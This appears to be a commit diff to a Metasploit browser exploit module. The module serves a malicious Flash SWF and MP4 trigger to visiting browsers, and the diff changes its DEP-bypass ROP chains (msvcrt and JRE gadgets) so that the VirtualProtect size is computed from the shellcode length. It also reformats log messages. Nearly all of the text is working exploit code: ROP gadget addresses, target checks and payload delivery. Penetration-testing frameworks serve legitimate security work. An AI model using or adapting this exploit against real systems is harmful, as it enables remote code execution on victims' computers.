Dynamic VirtualProtect dwSize. Change output style.
This commit is contained in:
parent
de888e50f0
commit
25a1552fbd
|
@ -135,7 +135,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("Using msvcrt ROP against #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
rop =
|
||||
[
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
|
@ -146,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c4ec00, # POP EBP # RETN
|
||||
0x77c35459, # ptr to 'push esp # ret'
|
||||
0x77c47705, # POP EBX # RETN
|
||||
0x00000800, # <- change size to mark as executable if needed (-> ebx)
|
||||
exec_size, # EBX
|
||||
0x77c3ea01, # POP ECX # RETN
|
||||
0x77c5d000, # W pointer (lpOldProtect) (-> ecx)
|
||||
0x77c46100, # POP EDI # RETN
|
||||
|
@ -154,16 +155,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x77c4d680, # POP EDX # RETN
|
||||
0x00000040, # newProtect (0x40) (-> edx)
|
||||
0x77c4e392, # POP EAX # RETN
|
||||
nop, # NOPS (-> eax)
|
||||
nop, # NOPS (-> eax)
|
||||
0x77c12df9, # PUSHAD # RETN
|
||||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("Using JRE ROP against #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||
exec_size = [0-code.length].pack('V').unpack('L')[0].to_i
|
||||
rop =
|
||||
[
|
||||
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
|
||||
0xfffffdff, # Value to negate, will become 0x00000201 (dwSize)
|
||||
exec_size, # Value to negate, will become 0x00000201 (dwSize)
|
||||
0x7c347f98, # RETN (ROP NOP)
|
||||
0x7c3415a2, # JMP [EAX]
|
||||
0xffffffff,
|
||||
|
@ -217,23 +219,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, will not launch attack: #{agent.to_s}: #{cli.peerhost}:#{cli.peerport}")
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Client requesting: #{request.uri}")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending MP4...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||
mp4 = create_mp4(my_target)
|
||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} Sending Exploit SWF...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
@ -305,7 +307,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
end
|
||||
|
||||
add_resource({'Path'=>'/test.mp4', 'Proc'=>proc}) rescue nil
|
||||
print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue